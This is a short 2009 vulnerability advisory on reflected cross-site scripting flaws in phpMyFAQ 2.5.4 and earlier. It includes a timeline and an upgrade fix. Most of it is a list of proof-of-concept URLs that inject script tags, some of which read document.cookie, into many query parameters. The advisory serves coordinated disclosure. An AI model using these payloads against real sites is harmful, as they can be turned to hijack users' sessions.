phpMyFAQ versions 2.5.4 and below suffer from cross site scripting vulnerabilities.
295a8c687d620a3ce6e91c5619c7fe37d66845b84f36c8dcaa9295aa53062b3e
################################################################################
Mutliple XSS in phpMyFAQ <= 2.5.4
Name Multiple vulnerabilities in phpMyFAQ
Systems Affected phpMyFAQ <= 2.5.4
Site http://www.phpmyfaq.de/
Author Amol Naik (amolnaik4[at]gmail.com)
Date 02/12/2009
################################################################################
############
OVERVIEW
############
phpMyFAQ 2.5 is a multilingual, completely database-driven FAQ-system.
######################
PoC
######################
http://localhost/phpmyfaq/index.php?action=sitemap&lang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?search=hello"><script>alert(document.cookie)</script>&action=search
http://localhost/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en&highlight=you"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=artikel&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=sitemap&letter=W&lang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=sitemap&letter=W"><script>alert(1)</script>&lang=en
http://localhost/phpmyfaq/index.php?sid=7&lang=en"><script>alert(document.cookie)</script>&action=show&cat=1
http://localhost/phpmyfaq/index.php?sid=7&lang=en&action=show&cat=1"><script>alert(document.cookie)</script>
http://localhost/phpmyfaq/index.php?action=search&tagging_id=1"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=news&newsid=1&newslang=en"><script>alert(document.cookie)</script>
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1&id=1&artlang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1"><script>alert(1)</script>&id=1&artlang=en
http://localhost/phpmyfaq/index.php?action=send2friend&cat=1&id=1"><script>alert(1)</script>&artlang=en
http://localhost/phpmyfaq/index.php?action=translate&cat=1&id=1&srclang=en"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=translate&cat=1&id=1"><script>alert(1)</script>&srclang=en
http://localhost/phpmyfaq/index.php?action=translate&cat=1"><script>alert(1)</script>&id=1&srclang=en
http://localhost/phpmyfaq/index.php?action=add&question=1&cat=1"><script>alert(1)</script>
http://localhost/phpmyfaq/index.php?action=add&question=1"><script>alert(1)</script>&cat=1
#############
Reference
#############
http://www.phpmyfaq.de/advisory_2009-12-01.php
#############
Workaround
#############
Upgrade to phpMyFAQ 2.5.5.
Download:
http://www.phpmyfaq.de/download.php
############
TimeLine
############
Bug discovered : 05/11/2009
Informed Vendor : 05/11/2009
Vendor releases new version : 02/12/2009
Public Disclosure : 02/12/2009